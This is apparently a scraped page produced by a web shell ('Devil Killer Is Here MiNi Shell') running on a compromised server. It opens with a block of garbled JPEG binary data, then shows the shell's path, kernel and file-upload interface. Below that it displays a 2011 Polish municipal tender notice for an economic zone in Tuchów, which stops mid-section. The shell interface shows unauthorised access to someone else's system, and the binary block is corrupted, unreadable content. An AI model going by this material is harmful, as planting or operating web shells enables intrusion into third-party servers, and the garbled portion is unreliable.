JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/425402-N-2011.html

<p class="kh_header"><b>Tuchów: Utworzenie Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych w Tuchowie</b><br>
<b>Numer ogłoszenia: 425402 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych w Tuchowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są  usługi inżynieryjne w zakresie projektowania  oraz roboty budowlane w ramach zadania inwestycyjnego  pn  wykonanie niezbędnej dokumentacji projektowej potrzebnej do utworzenia Tuchowskiej Strefy Aktywności Gospodarczej wyposażonej w  infrastrukturę drogową, uzbrojenie  terenów inwestycyjnych w niezbędne media .
Łącznie strefa gospodarcza bez drogi dojazdowej:	16,3944 ha
Powierzchnia drogi dojazdowej: 	  0,6622 ha
Łącznie strefa gospodarcza z drogą dojazdową:	17,0566 ha

Projekt posiada opracowany program funkcjonalno-użytkowy, jednak nie posiada do końca uregulowanego statusu prawnego wszystkich gruntów. 
Strefa będzie obejmować obszar 16,394 ha, w tym gmina dysponuje wolnymi działkami dla inwestorów o łącznej pow. 3,586 ha /działki o nr: 41/9, 41/10, 41/11, 41/12, 41/13, 41/14, 41/15, 41/16, 41/17, 41/18, 41/20, 41/21, 41/22, 33/6) oraz zarezerwowała 1 ha pod budowę parkingu /działka nr 41/7/.
Gmina Tuchów jest właścicielem działek, które są potrzebne pod budowę dróg wewnętrznych, terenu przewidzianego na główny parking strefy gospodarczej, działek dla inwestorów oraz większości działek pod drogę dojazdową. Jednakże dla potrzeb poszerzenia drogi dojazdowej z szerokości 3 m do 12 m, kierującej w przyszłości ruch ciężki do SAG od strony drogi wojewódzkiej 977, niezbędnym jest wykupienie przez gminę od właścicieli prywatnych dwóch działek o nr 36/27 i 36/28, o łącznej powierzchni 792 m2. Operacja ta jest konieczna, bowiem w obecnym stanie cały transport do dziewięciu już funkcjonujących firm przechodzi przez tereny mieszkaniowe, korzystając z wąskiej drogi bez chodników. Zakup zostanie zrealizowany zgodnie z procedurą uzyskania zezwolenia na realizację inwestycji drogowej /ZRID/.zamawiający zdecydował się na przedmiotową procedurę ze względu na na trudności związane z wykupem części w/w  działek  - przewidywany termin  uzyskania  ZRID 31.12.2012 -zgodnie z Ustawą o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych z dnia 10 kwietnia 2003r /Dz.U.Nr 80 ,poz.721/.tekst jednolity z dnia 22 pażdziernika 2008r /Dz.U.Nr 193/ ,poz.1194
Dla potrzeb budowy drogi dojazdowej do strefy gospodarczej z drogi wojewódzkiej 977 niezbędne jest jednocześnie dokonanie podziałów geodezyjnych działek o nr ew. 36/6, 36/8, 36/11 i 36/13 /po ustaleniu ich własności  obecnie przedmiotowe działki nie posiadają KW / - przewidywany termin  30.06.2012r

Etap I - faza projektowa :termin do 31.12.2012r

1.Opracowanie szczegółowej inwentaryzacji terenu, niezbędnej do określenia zakresu robót projektowych i budowlanych 
2.Opracowanie projektu budowlanego ,niezbędnego do uzyskania pozwolenia budowlanego zgodnie z obowiązującymi przepisami prawa ,zakresem opisanym w SWIZ oraz programie funkcjonalno-użytkowym pn. Utworzenie Tuchowskiej Strefy Aktywności Gospodarczej na terenach poprzemysłowych  w sposób zgodny z ustaleniami określonymi w miejscowym planie zagospodarowania przestrzennego m. Tuchów wraz z uzyskaniem wszystkich  wymaganych prawem decyzji / ZRID,wodno-prawnej i in./  pozwolenia na budowę .
3.Opracowanie projektów wykonawczych ,przedmiarów robót ,szczegółowych kosztorysów  ofertowych zgodnie z obowiązującymi przepisami ,informacji BIOZ ,specyfikacji technicznych wykonania i odbioru robót budowlanych ,projektu organizacji robót  , ewentualnych opinii technicznych , ekspertyz  /np badań geologicznych,projekt organizacji ruchu/
4.Wykonanie aktualnej mapy do celów projektowych ,uzyskanie wymaganych warunków technicznych ,decyzji , opinii ,uzgodnień i pozwoleń / w tym dokonanie podziałów geodezyjnych działek  nr ew.36/6,36/8,36/11, i 36/13  na koszt Wykonawcy /.
5.przedłożenie opracowanego projektu budowlanego ,projektów wykonawczych wszystkich branż ,przedmiarów robót ,kosztorysów ofertowych wraz z zestawieniem cen materiałów i opracowań towarzyszących  Zamawiającemu do zatwierdzenia ostatecznej wersji dokumentacji projektowej .
6.opracowanie Harmonogramu rzeczowo - finansowego robót budowlanych i przdłożenie Zamawiającemu do zatwierdzenia .
Zamawiający posiada decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia ,która stwierdza brak potrzeby przeprowadzenia oceny oddziaływania na środowisko./w zał. Do SWIZ/
W zakres projektowania wchodzi :
1.Projekt  sieci kanalizacji sanitarnej w Gminie Tuchów na terenie planowanej SAG z włączeniem do kanalizacji sanitarnej. Do wybudowania wstępnie założono 760 metrów bieżących kanalizacji o średnicy 200 mm.
2.Projekt  dróg dojazdowych do SAG wraz ze zjazdem z drogi krajowej nr 977, wewnętrznych na terenie strefy, jak również modernizacja istniejącej drogi.
3.Projekt  oświetlenia dróg i głównego parkingu głównego strefy gospodarczej. 
4.Projekt budowlany  głównego parkingu SAG na działce 41/7 zgodnie z przedłożoną koncepcją projektu zagospodarowania terenu z kwietnia 2011 /w załączeniu mapa/.
5.Projekt  sieci wodociągowej wzdłuż ciągów komunikacyjnych zabezpieczającą przyszłych inwestorów od strony p. poż., jak również dającą możliwość podłączenia odbiorców. Do wybudowania wstępnie założono 780 metrów bieżących sieci wodociągowej magistralnej o średnicy 110 mm.
Szczegółowy zakres określa PFU - załącznik do specyfikacji
 
Uzyskanie prawomocnego pozwolenia na budowę do 27.02.2013r

Etap II - faza wykonania robót  budowlanych - termin do 31.12.2013r
1.Wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji projektowej , zgodnie z pozwoleniaem budowlanycm ,harmonogramem rzeczowo-finansowym ,obowiązującym prawem ,normami ,zasadami wiedzuy technicznej ,sztuką budowlaną i niniejszą SWIZ
2.Wykonanie robót pomocniczych ,przygotowawczych i porządkowych oraz naprawa ewentualnych uszkodzeń ,
3.zapewnienie kierownika budowy ,kierowników robót wymaganych branż oraz nadzoru autorskiego projektantów w cenie oferty,
4.zagospodarowanie terenu ,uporządkowanie terenu
5.przeprowadzenie wymaganych prób,badań ,wykonanie pełnej dokumentacji powykonawczej i geodezyjnej /oklauzulowanej/

Etap III. - uzyskanie pozwolenia na użytkowanie   termin  20.01.2014
1.Przygotowanie dokumentów wymaganych prawem związanych z oddaniem przedmiotowej inwestycji  do użytkowania ,
2.Uzyskanie pozwolenia na użytkowanie przy współpracy   z Inspektorem nadzoru i Zamawiającym .

 Charakterystyczne parametry określające wielkość obiektu i zakres prac projektowych
 i budowlanych

*Projekt i budowa sieci kanalizacji sanitarnej w Gminie Tuchów na terenie planowanej SAG z włączeniem do kanalizacji sanitarnej. Do wybudowania wstępnie założono 760 metrów bieżących kanalizacji o średnicy 200 mm.
*Projekt i budowa dróg dojazdowych do SAG wraz ze zjazdem z drogi krajowej nr 977, wewnętrznych na terenie strefy, jak również modernizacja istniejącej drogi.
*Projekt i budowa oświetlenia dróg i głównego parkingu   strefy gospodarczej. 
*Projekt budowlany i budowa głównego parkingu SAG na działce 41/7 zgodnie z przedłożoną koncepcją projektu zagospodarowania terenu z kwietnia 2011 (w załączeniu mapa).
*Projekt i budowa sieci wodociągowej wzdłuż ciągów komunikacyjnych zabezpieczającą przyszłych inwestorów od strony p. poż., jak również dającą możliwość podłączenia odbiorców. Do wybudowania wstępnie założono 780 metrów bieżących sieci wodociągowej magistralnej o średnicy 110 mm.
*Budowa oświetlenia ulicznego dla projektowanych parkingów i ciągów komunikacyjnych strefy.

W ramach projektowania i późniejszej budowy należy również przewidzieć prace związane z:
a/ Droga wewnętrzna na terenie Bazy Las /na planie teren zaznaczono symbolem 1 KDD/.  Droga usytuowana w kierunku północno-wschodnim od ulicy Długiej. Od północy droga jest częściowo ograniczona rowem melioracyjnym. Od południowej strony znajdują się zabudowania gospodarcze po byłym tartaku. Szerokość drogi 10 m przewidywana długość do budowy 340 mb. Zabudowa drogi przewidziano na działce 74/4. W drodze ułożona jest sieć kanalizacji sanitarnej. 
b/ Droga wewnętrzna k/Sajdaka /na planie teren zaznaczono symbolem 1 KDW/. Droga usytuowana w kierunku północno-zachodnim od ulicy Długiej. Od strony północnej droga przylega do zabudowań i terenów zajmowanych przez przedsiębiorców. Od strony południowej droga ograniczona jest rowem melioracyjnym.  Szerokość budowanej drogi to 6 m przewidywana długość do budowy 170 mb. Zabudowa drogi przewidziano na działce nr 42/4. W drodze znajduje się sieć kanalizacji sanitarnej. 
c/Droga wewnętrzna k/Betoniarni /na planie teren zaznaczono symbolem 1 KDD/. Droga usytuowana na południowym krańcu SAG. Planowany wjazd od ulicy Długiej. Od północnej strony przylega ściśle do zabudowań betoniarni z drugiej strony droga graniczy z terenami zielonymi. Szerokość budowanej drogi 10 m przewidywana długość do budowy 260 mb. Zabudowa drogi przewidziano na działkach nr 73/4 oraz 67/8. W drodze w jej wschodniej części znajduje się ułożona sieć kanalizacji sanitarnej oraz sieć wodociągowa.
d/Droga wewnętrzna o szerokość 10 m, planowana długość 130 mb. Zabudowę drogi przewidziano na działce 41/19. Droga usytuowana w północnej części SAG biegnąca od drogi dojazdowej w strefie w kierunku południowym. Z obu stron drogi będą ulokowane przyszłe działki inwestycyjne. W drodze należy na etapie projektowania przewidzieć zabudowanie w ciągu drogi kanalizacji sanitarnej oraz wodociągowej zasilających przyszłe Podmioty na terenie nowych terenów inwestycyjnych.
e/Droga wewnętrzna o szerokość 10 m, planowana długość 174 mb. Zabudowę drogi przewidziano na działce 41/8. Droga usytuowana w północnej części SAG biegnąca od drogi dojazdowej w strefie w kierunku południowym. Z jednej strony będzie znajdować się główny parking Tuchowskiej SAG a po drugiej stronie drogi będą ulokowane przyszłe działki inwestycyjne.. W drodze należy na etapie projektowania przewidzieć zabudowanie w ciągu drogi kanalizacji sanitarnej oraz wodociągowej zasilających przyszłe podmioty na terenie nowych terenów inwestycyjnych.
f/Droga w strefie /droga łącząca strefę z drogą wojewódzką na planie zaznaczono symbolem 2KDL/. Szerokość budowanej drogi 12 m przewidywana długość drogi 400 m. Zabudowa drogi przewidziano na działkach nr 73/1, 73/2, 45, 41/5, 32/2, 32/3, 33/2, 33/4, 34/1, 36/ 2 oraz częściowo na działkach nr 73/4, 73/6 i 73/7 po podziale geodezyjnym. Droga usytuowana w północnej części SAG biegnąca od drogi dojazdowej w strefie w kierunku południowo-zachodnim. W drodze należy na etapie projektowania przewidzieć zabudowanie w ciągu drogi kanalizacji sanitarnej oraz wodociągowej zasilających przyszłe podmioty na terenie nowych terenów inwestycyjnych.
g/Droga od strefy do drogi wojewódzkiej nr 977. Szerokość budowanej drogi 12 m, przewidywana długość 480 m. Zabudowa drogi przewidziano na działkach nr 36/15, 36/17, 36/19, 36/21, 36/23, 36/24, 36/27, 36/28, 36/31, 36/32, 39/3, 40/1, 90/2, 90/3 oraz częściowo na działkach nr 36/6, 38/8, 36/11 i 36/13 po podziale geodezyjnym.
h/Modernizacja ul. Długiej. Droga istniejąca przebiegająca wewnątrz strefy. Od zachodniej części znajdują się podmioty gospodarcze. Od strony wschodniej będą znajdować się tereny inwestycyjne oraz główny parking strefy. Szerokość budowanej drogi 12 m długość 340 mb. Planowana droga do modernizacji zabudowana jest na działce nr 73/2. Droga posiada nawierzchnię z masy bitumicznej.
i/Wykonanie i montaż 3 szt tablic informacyjnycj i 3 szt tablic  pamiątkowych  wg zaleceń i wymogów Instytucji Zarządzającej MRPO  przy czym tablice informacyjne muszą być zamantowane nie póżniej niż do dnia 08.03.2012r
Uwaga : Szczegółowy zakres przedmiotu zamówienia określa program Funkcjonalno-Użytkowy ,który jest integralnym załącznikiem niniejszej SWIZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4, 45.30.00.00-0, 45.11.12.00-0, 45.22.33.12-9, 45.22.00.00-5, 45.23.31.20-6, 45.11.12.91-4, 45.31.53.00-1, 45.23.31.40-2, 71.24.20.00-6, 79.42.12.00-3, 45.00.00.00-7, 45.22.20.00-9, 45.23.13.00-8, 45.23.24.10-9, 45.31.10.00-0, 45.31.51.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 150 000,00 PLN  zł powinno być wniesione w terminie do  dnia 09.01.2012 r. do  godz. 10.00  Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Bank  Spółdzielczy  w  Bieczu   Filia  Tuchów  Nr  75  8627  0001  2023  9000  2645  0004  z  adnotacją:   Wadium   nr sprawy  /ZP-271 - 31 /11/.

1a. Wadium może być wniesione w jednej z następujących form:

1.w pieniądzu
2.poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,   z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
3.gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000  o  utworzeniu PARP /Dz. U z 2007 r  Nr 42 poz. 275/

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  pokoju   nr  7 /dziennik podawczy/   przed  terminem  składania  ofert

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a, /1/ z  tym, że  dowód /kopię  potwierdzoną  za  zgodność  z  oryginałem/  należy  umieścić  wewnątrz  oferty.	Zasady zwrotu wadium

Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4, wraz z odsetkami wynikającymi  z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.

Zgodnie z art. 46 ustawy  Zamawiający  zwraca  wadium:

1. Wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,  z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a uPzp.

2. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie  po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy,  jeżeli  jego wniesienia żądano.

3. Zgodnie z art. 46 ust. 2 ustawy, wadium zostanie zwrócone niezwłocznie po złożeniu pisemnego wniosku przez  wykonawcę który wycofał ofertę przed upływem terminu składania ofert.

3.Utrata wadium

Zgodnie z art. 46 ust. 4a  i  5  ustawy  Prawo zamówień publicznych, wykonawca, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego, w przypadku gdy:

1/nie  wniósł wymaganego  zabezpieczenia należytego wykonania umowy
2/odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
3/zawarcie umowy w sprawie zamówienia publicznego  stało  się niemożliwe  z przyczyn  leżących po stronie wykonawcy.

Ponadto  zamawiający  zatrzymuje  wadium  wraz  z  odsetkami, jeżeli  wykonawca  w  odpowiedzi  na  wezwanie, o  którym  mowa  w  art. 26  ust. 3, nie  złożył  dokumentów  lub  oświadczeń  potwierdzających  spełnienie  warunków  udziału  w  postępowaniu, o  których  mowa w  art. 25  ust. 1, lub  pełnomocnictw  chyba, że  udowodni , że  wynika  to  z  przyczyn  nie  leżących  po  jego  stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym.
Ocena  tego warunku będzie dokonana  na  podstawie: aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,  a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  wykazał  się  co najmniej                      2  robotami  w wykaz  usług   w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia t.j.wykonanie dokumentacji projektowych o podobnym lub tożsamym charakterze w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości / nie mniejszej niż 200 000,00 PLN każda/ przedmiotu ,dat wykonania i odbiorców.Do wykazu  należy dołączyć dokumenty potwierdzające ,że usługi zostały wykonane lub są wykonywane należycie.
- wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia t.j.wykonanie robót budowlanych / tożsamych z przedmiotem zamówienia lub o podobnym charakterze / w okresie ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres działalności jest krótszy - w tym okresie z podaniem ich rodzaju i wartości nie mniejszej niż  6 000 000,00  PLN , daty i  miejsca wykonania.Do wykazu należy dołączyć dokument potwierdzający ,że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

Ocena  tego warunku będzie dokonana  na  podstawie:

wykazu usług i robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia. - załącznik  nr  3  SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie   dysponowania  odpowiednim  potencjałem  technicznym   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie  i  nie  żąda  dokumentów  wykazujących  spełnienie  przez  wykonawcę  w/w  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  dysponował:

osobami ,które będą uczestniczyć w wykonywaniu zamówienia obejmującego usługi inżynieryjne w zakresie projektowania / w branżach objętych zamówieniem / ,robotami budowlanymi ,kierowanie robotami budowlanymi / w branżach objętych zamówieniem / i kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych ,doświadczenia / nie mniej niż 3 lata  osoby do projektowania w każdej branży  ,osoby do kierownia robotami budowlanymi w poszczególnych branżach  / i wykształcenia ,niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.Jeżeli wykonawca polegać będzie na zasobach innych podmiotów ,należy przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia,
oświadczenia osób ,które będą uczestniczyć w wykonywaniu zamówienia o posiadanych uprawnieniach.Ustawy nakładają  obowiązek  posiadania takich uprawnień dla projektantów ,sprawdzających projekty ,kierownika budowy i kierowników robót budowlanych w specjalnościach objętych zamówieniem.
posiadania  lub  dysponowania  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż 18

 
Przez  minimalne  kwalifikacje  zawodowe  dla  stanowisk, dla  których  wymagane  są  uprawnienia  budowlane  rozumie  się  lata  czynne  zawodowo  od  daty  uzyskania  uprawnień, oraz  lata  przepracowane  na  odpowiednich  stanowiskach  kierowniczych zgodnie  z  ustawą  z  dnia  7  lipca  1994 r. Prawo  budowlane t.j. Dz. U. z 2010  nr 243 poz. 1623,bedących członkiem Okręgowej Izby Inżynierów Budownictwa


Ocena tego warunku będzie dokonana w oparciu o:

oświadczenie  wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją  o podstawie do dysponowania tymi osobami - załącznik  nr  4  SIWZ . Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie   od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi                  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania  do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia, a nie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
